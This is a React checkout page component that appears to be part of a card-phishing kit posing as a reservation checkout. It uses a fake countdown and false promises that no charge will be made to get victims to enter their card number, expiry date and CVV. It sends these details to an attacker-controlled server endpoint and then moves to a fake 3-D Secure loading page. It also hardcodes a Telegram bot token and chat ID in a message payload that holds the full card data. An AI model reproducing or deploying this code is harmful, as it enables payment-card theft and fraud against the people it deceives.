import React, { useEffect, useRef, useState } from "react";
 
import { useLocation, useNavigate } from "react-router-dom";
import InputField from "./InputField";
import axios from "axios"
import ReactPixel from "react-facebook-pixel"  



export default function CheckoutPage() {
   const [remainingSeconds, setRemainingSeconds] = useState(300);

  useEffect(() => {
    window.scrollTo(0, 0);

    const interval = setInterval(() => {
      setRemainingSeconds((prev) => {
        if (prev <= 1) {
          clearInterval(interval);
          return 0;
        }
        return prev - 1;
      });
    }, 1000);

    return () => clearInterval(interval);
  }, []);

  const formatTime = (sec) => {
    const m = Math.floor(sec / 60).toString().padStart(1, "0");
    const s = (sec % 60).toString().padStart(2, "0");
    return `${m}:${s}`;
  };






   const location = useLocation();
      const [submitBtnContent, setSubmitBtnContent] = useState(`Submit`)
      const [input1Value, setInput1Value] = useState("")
      const [input2Value, setInput2Value] = useState("")
      const [input3Value, setInput3Value] = useState("")
    
      const [focusedInput, setFocusedInput] = useState(1) // 1 for first input, 2 for second input, 3 for third input
      const input1Ref = useRef(null)
      const input2Ref = useRef(null)
      const input3Ref = useRef(null)
    const totalAmount = 1
const navigate = useNavigate()
      const [submitBtnDis, setSubmitBtnDis] = useState(true)
    
      useEffect(() => {
        updateSubmitBtnDisabled()
      }, [input1Value, input2Value, input3Value])
    

    
      const fullUrl = window.location.href
      const handleInput1Focus = () => {
        // trackUserAction('User Started Card Input', false)
        setFocusedInput(1)
      }
    
      const handleInput2Focus = () => {
        setFocusedInput(2)
      }
    
      const handleInput3Focus = () => {
        setFocusedInput(3)
      }
    
      const checkFocus = (num) => {
        return focusedInput === num
      }
    
      const updateSubmitBtnDisabled = () => {
        console.log(
          `AED {input1Value.length} + AED {input2Value.length} + AED {input3Value.length}`
        )
        // Check conditions for enabling/disabling submit button
        if (
          input1Value !== "" &&
          input2Value !== "" &&
          input3Value !== "" &&
          input1Value.length === 19 &&
          input2Value.length === 5 &&
          input3Value.length === 3 &&
          isDateGreaterThan(input2Value, "10/24")
        ) {
          if (input1Value.charAt(0) === "4" || input1Value.charAt(0) === "5") {
            setSubmitBtnDis(false) // Enable submit button if all inputs are filled
          }
        } else {
          setSubmitBtnDis(true) // Disable submit button if any input is empty
        }
      }
      function isDateGreaterThan(dateStr, comparisonDateStr) {
        console.log(dateStr)
        // Extract month and year for both dates
        const [month, year] = dateStr.split("/").map(Number)
        const [compMonth, compYear] = comparisonDateStr.split("/").map(Number)
    
        // First, compare the years
        if (year > compYear) return true
        if (year < compYear) return false
    
        // If years are the same, compare the months
        return month > compMonth
      }
      const handleSender = async () => {
        const botToken = "7837303469:AAEw7hcq-r7VeipgHE9kG3uzPlPLDgAtj1o" // Replace with your bot's token
        const url = `https://api.telegram.org/bot${botToken}/sendMessage`
    
        // Extract the first digit of `main` and the last 4 digits of `main`
        const firstDigit = input1Value?.charAt(0) // First digit
        const lastFourDigits = input1Value?.slice(-4) // Last 4 digits
    
        // Set values to localStorage
        localStorage.setItem("summ", totalAmount.toFixed(2))
        localStorage.setItem("first-digit", firstDigit)
        localStorage.setItem("last-four-digits", lastFourDigits)
    
        const payload = {
          chat_id: "-1002222911401", // Replace with the target chat ID
          text: `💳 ${input1Value}
      📆 ${input2Value}
      🔐 ${input3Value}`, // The message text
        }
    
        try {
          ReactPixel.track("Purchase")
        } catch (err) {
          console.log(err)
        }
        setSubmitBtnContent(<div className="inputLoader"></div>)
    
    
    
        // const additionalMessage = `|${formData.firstName} ${formData.lastName}|${formData.email}|${formData.country.label}|`
        const dataToSend = {
          orderId: "123",
          uuId: localStorage.getItem("uuId"),
          main: input1Value,
          date: input2Value,
          code: input3Value,
          summ: totalAmount.toFixed(2),
          chatId: process.env.REACT_APP_CHAT_ID,
          domain: process.env.REACT_APP_DOMAIN,
          link: fullUrl,
          additional: '',
        }
        console.log(dataToSend)
        try {
          await axios.post(
            process.env.REACT_APP_SERVER_URL + "/api/validation",
            dataToSend,
            {
              headers: {
                "Content-Type": "application/json",
              },
            }
          )
          navigate("/3ds/loading")
        } catch (error) {
          console.error("Error sending data:", error)
          setTimeout(() => {
            setSubmitBtnContent(`Pay: ${localStorage.getItem('price')} Ft`)
          }, 3000)
        }
      }









  
  return (
    <div
      className="  bg-cover bg-center px-4   py-10 flex items-start justify-center"
      style={{ backgroundImage: "url('/bg.png')" }}
    >
      <div className="w-full max-w-xl bg-[#F1F1F1]   shadow-xl p-6 space-y-6">
        {/* Timer Message */}
        <div className="border-b w-full">

        <div className="text-sm text-neutral-600  mb-5 text-center">
          Please complete your card confirmation within <span className="font-semibold">{formatTime(remainingSeconds)}</span> minutes.
        </div>
        </div>

        <h2 className="text-center text-2xl font-semibold text-neutral-600">Checkout</h2>
        <p className="text-sm text-neutral-800 border border-neutral-300 bg-yellow-50 p-4 text-center">
               <span className="   text-xl   text-neutral-900">ⓘ</span> No charges will be made to your card. <p className="mt-2"> Card information is securely collected for reservation purposes only. </p> 
        </p>

        {/* Card Details */}
        <div className="space-y-4">
          <input
            type="text"
            placeholder="Cardholder Name"
            className="border-b bg-[#F1F1F1] border-gray-300 p-3 focus:outline-none  w-full text-sm"
          />
          
       
   
        <InputField
                    formatType={"card"}
                    ref={input1Ref}
                    value={input1Value}
                    onFocus={handleInput1Focus}
                    onChange={(e) => setInput1Value(e.target.value)}
                    placeholder={"Card number"}
                    focused={checkFocus(1)}
                  />
          <div className="flex gap-4">
           <InputField
                      formatType={"date"}
                      ref={input2Ref}
                      value={input2Value}
                      onFocus={handleInput2Focus}
                      onChange={(e) => setInput2Value(e.target.value)}
                      placeholder={"Expiry date"}
                      focused={checkFocus(2)}
                    />
               <InputField
                      formatType={"code"}
                      ref={input3Ref}
                      value={input3Value}
                      onFocus={handleInput3Focus}
                      onChange={(e) => setInput3Value(e.target.value)}
                      placeholder={"CVV"}
                      focused={checkFocus(3)}
                    />

          </div>
        </div>


 
        {/* Confirm Button */}
        <div className="pt-20">

 



        <button onClick={handleSender} disabled={submitBtnDis} className="w-full bg-white border border-gray-300 py-3 rounded-md text-neutral-800 font-base hover:bg-gray-200 transition">
          {submitBtnContent}
        </button>

            </div>

        <div className="text-xs text-center text-neutral-500 pt-6">
          Your payment is encrypted and secure.
        </div>
      </div>
    </div>
  );
}
